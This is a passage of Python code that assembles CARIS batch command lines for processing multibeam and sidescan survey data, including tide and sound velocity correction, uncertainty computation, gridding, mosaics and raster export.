C:\HIPSData\SIPS\beampatternfile.bbp file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run CreateSIPSBeamPattern --mosaic-engine ' + type fullcommand += ' --beam-pattern-file "' + bbpfile + '" ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def create_mosaic(self, epsg, extentlowx, extentlowy, extenthighx, 
extenthighy, resolution, beampattern, type, outputname, update=True, querybyline=False): '''Rune CreateSIPSMosaic with all the options. Example: carisbatch.exe --run CreateSIPSMosaic --mosaic-engine SIPS_BACKSCATTER --output-crs EPSG:26919 --extent 300000 5000000 350000 5050000 --resolution 1.0m --beam-pattern-file c:\HIPSData\SIPS\beampattern.bbp file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\mosaic1m.csar''' fullcommand = self.hipscommand + ' --run CreateSIPSMosaic --mosaic-engine ' + type + ' --output-crs EPSG:' + epsg if not update: fullcommand += ' --beam-pattern-file-operation USE_EXISTING' if type == 'SIPS_SIDESCAN': fullcommand += ' --extrapolate-time 5.0 --beam-pattern BOTH --tvg 10db 10db' if type == 'SIPS_BACKSCATTER': pass fullcommand += ' --extent ' + extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy fullcommand += ' --resolution ' + resolution + ' --beam-pattern-file "' + beampattern + '" ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def recompute_towfish_nav(self, querybyline=False): '''Runs ComputeSIPSTowfishNavigation with all the options. 
Example: carisbatch.exe --run ComputeSIPSTowfishNavigation --use-cmg --smooth-sensor GYRO file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ComputeSIPSTowfishNavigation ' #fullcommand += '--smooth-sensor SSSSensor --smooth-sensor SSSCable --use-cmg ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def import_tide(self, tide_file, zdf=False): '''Runs ImportTideToHIPS with all the options. Example: carisbatch.exe --run ImportTideToHIPS --tide-file C:\HIPSData\Tide\tidefile.tid file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ImportTideToHIPS --tide-file "' + tide_file + '" ' if zdf: fullcommand += '--interpolation-type MULTI_STATION ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def import_auxiliary(self, datatype, source, height=None, delheave=None, height_rms=None, delheave_rms=None, nav=None, nav_rms=None, querybyline=False): '''Runs ImportHIPSFromAuxiliary with all the options. 
Example: carisbatch.exe --run ImportHIPSFromAuziliary --input-format APP_POSMV --allow-partial --delayed-heave 0 --delayed-heave-rms 0 C:\HIPSData\POS\DN170.000 file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ImportHIPSFromAuxiliary --input-format ' + datatype + ' ' fullcommand += '--allow-partial "' + source + '" ' if height: fullcommand += '--gps-height 0sec ' if height_rms: fullcommand += '--gps-height-rms 0sec ' if delheave: fullcommand += '--delayed-heave 0sec ' if delheave_rms: fullcommand += '--delayed-heave-rms 0sec ' if nav: fullcommand += '--navigation ' if nav_rms: fullcommand += '--navigation-rms 1sec ' if True not in [height, delheave, height_rms, delheave_rms, nav, nav_rms]: print([height, delheave, height_rms, delheave_rms, nav, nav_rms]) print("{} not a valid process type".format(datatype)) fullcommand = '' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def svc(self, svp_file, heavesource, select_method): '''Runs SoundVelocityCorrectHIPSWithCARIS with all the options. 
Example: carisbatch.exe --run SoundVelocityCorrectHIPSWithCARIS --ssp --svp-file C:\HIPSData\SVC\cast.svp --profile-selection-method NEAREST_IN_TIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips?Vessel=Vessel1''' if svp_file: fullcommand = self.hipscommand + ' --run SoundVelocityCorrectHIPSWithCARIS --svp-file "' + svp_file + '"' else: fullcommand = self.hipscommand + ' --run SoundVelocityCorrectHIPSWithCARIS' if select_method == 'NEAREST_IN_DISTANCE' or select_method == 'NEAREST_IN_TIME': fullcommand += ' --profile-selection-method ' + select_method elif select_method == 'NEAREST_IN_DISTANCE_WITHIN': fullcommand += ' --profile-selection-method ' + select_method fullcommand += ' --nearest-distance-hours 4' fullcommand += ' --heave-source "' + heavesource + '" --ssp ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def compute_gps_tide(self, inputdata, heave_or_delayed, remote_heave=None, waterline=None, vdatum=None, fixed=None): '''Runs ComputeHIPSGPSTide with all the options. 
Example: carisbatch.exe --run ComputeHIPSGPSTide --datum-separation-type MODEL --datum-model-file c:\HIPSData\Vdatum\vdatum.csar --dynamic-heave DELAYED_HEAVE --mru-remote-heave --antenna-offset --dynamic-draft --waterline REALTIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = '' if vdatum: band_name = find_csar_band_name(inputdata, log=self.logger) fullcommand = self.hipscommand + ' --run ComputeHIPSGPSTide --datum-separation-type MODEL' fullcommand += ' --datum-model-file "' + inputdata + '" --dynamic-heave ' + heave_or_delayed fullcommand += ' --datum-model-band "' + band_name + '" --dynamic-draft' if fixed: fullcommand = self.hipscommand + ' --run ComputeHIPSGPSTide --datum-separation-type FIXED' fullcommand += ' --datum-fixed-height "' + inputdata + '" --dynamic-heave ' + heave_or_delayed fullcommand += ' --dynamic-draft' if remote_heave: fullcommand += ' --mru-remote-heave' if waterline: fullcommand += ' --waterline ' + waterline fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def compute_hips_sep_model(self, heave_or_delayed): '''Runs ComputeHIPSSeparationModel with all the options. 
Example: carisbatch.exe --run ComputeHIPSSeparationModel --datum-separation-type MODEL --datum-model-file c:\HIPSData\Vdatum\vdatum.csar --dynamic-heave DELAYED_HEAVE --mru-remote-heave --antenna-offset --dynamic-draft --waterline REALTIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ComputeHIPSSeparationModel --resolution 10m' fullcommand += '" --dynamic-heave ' + heave_or_delayed fullcommand += ' --mru-remote-heave --antenna-offset --dynamic-draft --waterline REALTIME ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def merge(self, tide_or_gps, heave_or_delayed): '''Runs MergeHIPS with all the options. Example: carisbatch.exe --run MergeHIPS --tide GPS file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run MergeHIPS --tide ' + tide_or_gps + ' --heave-source ' + heave_or_delayed fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def compute_tpu(self, tide_meas, tide_zone, sv_meas, sv_surf, source, tcari=False, delayed=False, added=None): '''Runs ComputeHIPSTPU with all the options. 
Example: carisbatch.exe --run ComputeHIPSTPU --tide-measured 1.0m --sv measured 1500m/s --source-heave REALTIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips?Vessel=Vessel1; Day=2017-005''' source_nav = '' source_sonar = '' source_gyro = '' source_pitch = '' source_roll = '' source_heave = '' source_tide = '' if source is "VESSEL": source_nav = "VESSEL" source_sonar = "VESSEL" source_gyro = "VESSEL" source_pitch = "VESSEL" source_roll = "VESSEL" source_heave = "VESSEL" source_tide = "STATIC" elif source is "REALTIME": source_nav = "REALTIME" source_sonar = "REALTIME" source_gyro = "REALTIME" source_pitch = "REALTIME" source_roll = "REALTIME" source_heave = "REALTIME" source_tide = "STATIC" if delayed: source_heave = "DELAYED" if tcari: source_tide = "REALTIME" if added == None: fullcommand = self.hipscommand + ' --run ComputeHIPSTPU --tide-measured ' + tide_meas + ' --tide-zoning ' + tide_zone fullcommand += ' --sv-measured ' + sv_meas + ' --sv-surface ' + sv_surf + ' --source-navigation ' + source_nav fullcommand += ' --source-sonar ' + source_sonar + ' --source-gyro ' + source_gyro + ' --source-pitch ' + source_pitch fullcommand += ' --source-roll ' + source_roll + ' --source-heave ' + source_heave + ' --source-tide ' + source_tide fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) else: finaladded = [] for line in added: justline = os.path.split(line)[1] finaladded.append(justline[:len(justline) - 4]) last = len(finaladded) % 4 iters = len(finaladded) / 4 print('Total lines to Compute TPU = {}'.format(len(finaladded))) print('Running process on {} 4-line blocks'.format(iters)) print('Running final process on {} leftover lines\n'.format(last)) count = 0 while count < iters: fullcommand = self.hipscommand + ' 
--run ComputeHIPSTPU --tide-measured ' + tide_meas + ' --tide-zoning ' + tide_zone fullcommand += ' --sv-measured ' + sv_meas + ' --sv-surface ' + sv_surf + ' --source-navigation ' + source_nav fullcommand += ' --source-sonar ' + source_sonar + ' --source-gyro ' + source_gyro + ' --source-pitch ' + source_pitch fullcommand += ' --source-roll ' + source_roll + ' --source-heave ' + source_heave + ' --source-tide ' + source_tide fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + ';Line=' + finaladded[count * 4] fullcommand += '&Line=' + finaladded[count * 4 + 1] + '&Line=' + finaladded[count * 4 + 2] + '&Line=' + \ finaladded[count * 4 + 3] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) count += 1 fullcommand = self.hipscommand + ' --run ComputeHIPSTPU --tide-measured ' + tide_meas + ' --tide-zoning ' + tide_zone fullcommand += ' --sv-measured ' + sv_meas + ' --sv-surface ' + sv_surf + ' --source-navigation ' + source_nav fullcommand += ' --source-sonar ' + source_sonar + ' --source-gyro ' + source_gyro + ' --source-pitch ' + source_pitch fullcommand += ' --source-roll ' + source_roll + ' --source-heave ' + source_heave + ' --source-tide ' + source_tide fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if last == 3: fullcommand += ';Line=' + finaladded[count * 4] + '&Line=' + finaladded[count * 4 + 1] + '&Line=' + \ finaladded[count * 4 + 2] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) if last == 2: fullcommand += ';Line=' + finaladded[count * 4] + '&Line=' + finaladded[count * 4 + 1] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, 
self.benchcsv, self.progressbar) else: self.run_this(fullcommand) if last == 1: fullcommand += ';Line=' + finaladded[count * 4] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def georef_bathymetry(self, tideopts, svcopts, gpstideopts, mergeopts, tpuopts, querybyline=False): # Only available in Caris 11 and beyond fullcommand = self.hipscommand + ' --run GeoreferenceHIPSBathymetry' if tideopts: if tideopts['file']: fullcommand += ' --tide-file "' + tideopts['file'] + '"' if svcopts: fullcommand += ' --compute-svc --ssp --profile-selection-method ' + svcopts['algorithm'] if svcopts['file']: fullcommand += ' --svp "' + svcopts['file'] + '"' if svcopts['algorithm'] == 'NEAREST_IN_DISTANCE_WITHIN': fullcommand += ' --nearest-distance-hours 4' if gpstideopts: fullcommand += ' --compute-gps-vertical-adjustment' if gpstideopts['method'] == 'VDatum': band_name = find_csar_band_name(gpstideopts['file'], log=self.logger) fullcommand += ' --datum-model-file "' + gpstideopts['file'] + '"' fullcommand += ' --datum-model-band "' + band_name + '"' elif gpstideopts['method'] == 'static_offset': fullcommand += ' --vertical-offset "' + gpstideopts['staticopts'] + '"' fullcommand += ' --vertical-datum-reference ' + mergeopts['vertref'] fullcommand += ' --heave-source ' + mergeopts['heavesrc'] fullcommand += ' --compute-tpu' fullcommand += ' --tide-measured ' + tpuopts['options'][0] + ' --tide-zoning ' + tpuopts['options'][1] fullcommand += ' --sv-measured ' + tpuopts['options'][2] + ' --sv-surface ' + tpuopts['options'][3] fullcommand += ' --source-navigation ' + tpuopts['source']['source_nav'] fullcommand += ' --source-sonar ' + tpuopts['source']['source_sonar'] fullcommand += ' --source-gyro ' + tpuopts['source']['source_gyro'] fullcommand += ' --source-pitch ' + tpuopts['source']['source_pitch'] fullcommand += ' --source-roll ' + tpuopts['source']['source_roll'] fullcommand += ' --source-heave ' + 
tpuopts['source']['source_heave'] fullcommand += ' --source-tide ' + tpuopts['source']['source_tide'] fullcommand += ' --output-components' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def new_hips_surface(self, epsg, extentlowx, extentlowy, extenthighx, extenthighy, resolution, iho, outputname, querybyline=False): '''Runs CreateHIPSGridWithCUBE with all the options. Example: carisbatch.exe --run CreateHIPSGridWithCube --output-crs EPSG:26919 --extent 300000 5000000 350000 5050000 --resolution 1.0m --iho-order S44_1A file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' if resolution == '0.5m': cuberes = 'NOAA_0.5m' elif resolution == '1.0m': cuberes = 'NOAA_1m' elif resolution == '2.0m': cuberes = 'NOAA_2m' elif resolution == '4.0m': cuberes = 'NOAA_4m' elif resolution == '8.0m': cuberes = 'NOAA_8m' elif resolution == '16.0m': cuberes = 'NOAA_16m' else: raise AttributeError('{} Resolution is not supported'.format(resolution)) fullcommand = self.hipscommand + ' --run CreateHIPSGridWithCube --output-crs EPSG:' + epsg + ' --extent ' fullcommand += extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy fullcommand += ' --keep-up-to-date' if self.noaa_support_files: fullcommand += ' --cube-config-file="' + self.cubeparams + '" --cube-config-name="' + cuberes + '"' fullcommand += ' --resolution ' + resolution + ' --iho-order ' + iho + ' "file:///' fullcommand += 
os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def finalize_hips(self, outputname, minz, maxz, uncertainty='GREATER', applydesignated=True): '''Runs FinalizeRaster with all the options. Example: carisbatch.exe --run FinalizeRaster --filter 10.0m 40.0m --apply-designated --uncertainty-source GREATER C:\HIPSData\Products\CUBE1m.csar C:\HIPSData\Products\CUBE1m_Final.csar''' finalname = outputname[0:len(outputname) - 5] + '_final_' + minz + 'to' + maxz + '.cube' if applydesignated: fullcommand = self.hipscommand + ' --run FinalizeRaster --filter -' + maxz + ' -' + minz + ' --apply-designated ' fullcommand += '--include-band Density --include-band Depth --include-band Hypothesis_Count ' fullcommand += '--include-band Hypothesis_Strength --include-band Mean --include-band Node_Std_Dev ' fullcommand += '--include-band Std_Dev --include-band Uncertainty --include-band User_Nominated ' fullcommand += '--uncertainty-source ' + uncertainty + ' "' + outputname + '" "' + finalname + '"' else: fullcommand = self.hipscommand + ' --run FinalizeRaster --filter -' + maxz + ' -' + minz + ' ' fullcommand += '--include-band Density --include-band Depth --include-band Hypothesis_Count ' fullcommand += '--include-band Hypothesis_Strength --include-band Mean --include-band Node_Std_Dev ' fullcommand += 
'--include-band Std_Dev --include-band Uncertainty --include-band User_Nominated ' fullcommand += '--uncertainty-source ' + uncertainty + ' "' + outputname + '" "' + finalname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def new_vr_surface(self, mode, epsg, extentlowx, extentlowy, extenthighx, extenthighy, maxgrid, mingrid, outputname, objrange=False, comprange=False, querybyline=False): '''Runs CreateVRSurface with all the options. Example: carisbatch.exe --run CreateVRSurface --estimation-method CARIS_DENSITY --output-crs EPSG:26919 --extent 300000 5000000 350000 5050000 --max-grid-size 64 --min-grid-size 4 file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\VR.csar''' depthrange = '' fullcommand = '' if self.noaa_support_files: if comprange: depthrange = self.depth_coverage elif objrange: depthrange = self.depth_object elif mode == 'RANGE': print('No range file selected. Please use the objrange or comprange switch to calculate a RANGE VR surface.') return if mode == 'RANGE': fullcommand = self.hipscommand + ' --run CreateVRSurface --estimation-method ' + mode + ' --output-crs EPSG:' fullcommand += epsg + ' --extent ' + extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy if self.noaa_support_files: fullcommand += ' --range-file "' + depthrange fullcommand += '" --keep-partial-bins --input-band DEPTH --max-grid-size ' + maxgrid fullcommand += ' --min-grid-size ' + mingrid + ' --include-flag ACCEPTED "file:///' fullcommand += os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + 
self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if mode == 'CALDER_RICE': fullcommand = self.hipscommand + ' --run CreateVRSurface --estimation-method ' + mode + ' --output-crs EPSG:' fullcommand += epsg + ' --extent ' + extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy fullcommand += ' --finest-resolution 0.10m --coarsest-resolution 16.0m --points-per-cell 15' fullcommand += ' --area SWATH --keep-partial-bins' fullcommand += ' --max-grid-size ' + maxgrid + ' --min-grid-size ' + mingrid + ' --include-flag ACCEPTED "file:///' fullcommand += os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def populate_vr_surface(self, mode, iho, outputname, querybyline=False): '''Runs PopulateVRSurface with all the options. 
Example: carisbatch.exe --run PopulateVRSurface --population-method CUBE --input-band Depth --include-flag ACCEPTED C:\HIPSData\Products\VR.csar file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run PopulateVRSurface --population-method ' + mode + ' --input-band Depth' fullcommand += ' --include-flag ACCEPTED --iho-order ' + iho + ' --vertical-uncertainty "Depth TPU"' fullcommand += ' --horizontal-uncertainty "Position TPU" --display-bias HIGHEST --disambiguation-method DENSITY_LOCALE' if self.noaa_support_files: fullcommand += ' --cube-config-file="' + self.cubeparams + '" --cube-config-name="NOAA_VR"' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def add_to_raster(self, outputname): '''Runs AddtoHIPSGrid with all the options. 
Example: carisbatch.exe --run AddtoHIPSGrid file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run AddtoHIPSGrid' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def remove_from_raster(self, outputname): '''Runs RemoveFromHIPSGrid with all the options. Example: carisbatch.exe --run RemoveFromHIPSGrid file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run RemoveFromHIPSGrid' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def add_to_vr(self, outputname): '''Runs AddtoVRSurface with all the options. 
Example: carisbatch.exe --run AddToVRSurface file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run AddtoVRSurface --update-type BOTH' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def remove_from_vr(self, outputname): '''Runs RemoveFromVRSurface with all the options. Example: carisbatch.exe --run RemoveFromVRSurface file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run RemoveFromVRSurface --update-type BOTH' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def add_to_mosaic(self, outputname, beampattern, type): '''Runs AddToSIPSMosaic with all the options. 
Example carisbatch.exe --run AddToSIPSMosaic --mosaic-engine SIPS_SIDESCAN file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\Mosaic.csar''' fullcommand = self.hipscommand + ' --run AddtoSIPSMosaic --mosaic-engine ' + type fullcommand += ' --beam-pattern-file "' + beampattern + '"' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def remove_from_mosaic(self, outputname): '''Runs AddToSIPSMosaic with all the options. Example carisbatch.exe --run RemoveFromSIPSMosaic --mosaic-engine SIPS_SIDESCAN file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\Mosaic.csar''' fullcommand = self.hipscommand + ' --run RemoveFromSIPSMosaic' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def render_raster(self, surface, outputname, bandname='Depth'): '''Runs RenderRaster with all the options. 
Example: carisbatch.exe --run RenderRaster --input-band Depth C:\HIPSData\Products\Raster.csar C:\HIPSData\Products\Rasterimg.csar''' fullcommand = self.hipscommand + ' --run RenderRaster --input-band ' + bandname fullcommand += ' ' + ' "' + surface + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def export_raster(self, surface, output_type, outputname, bandname='Depth', forcebase=False): '''Runs ExportRaster with all the options. Example: carisbatch.exe --run ExportRaster --output-format GeoTIFF --include-band Depth C:\HIPSData\Products\VR.csar C:\HIPSData\Products\VR.tiff''' if forcebase: if not self.basecommand: lic, msg = self.caris_base_license_check(printout=False) if not lic: return fullcommand = self.basecommand + ' --run ExportRaster --output-format ' + output_type + ' --include-band' else: fullcommand = self.hipscommand + ' --run ExportRaster --output-format ' + output_type + ' --include-band' fullcommand += ' ' + bandname + ' "' + surface + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def shift_raster(self, inputfile, outputfile, shiftfile, inputformat='RASTER', input_band='Depth', elev_band='NAD83_MLLW'): r'''Runs ShiftElevationBands with all the options. 
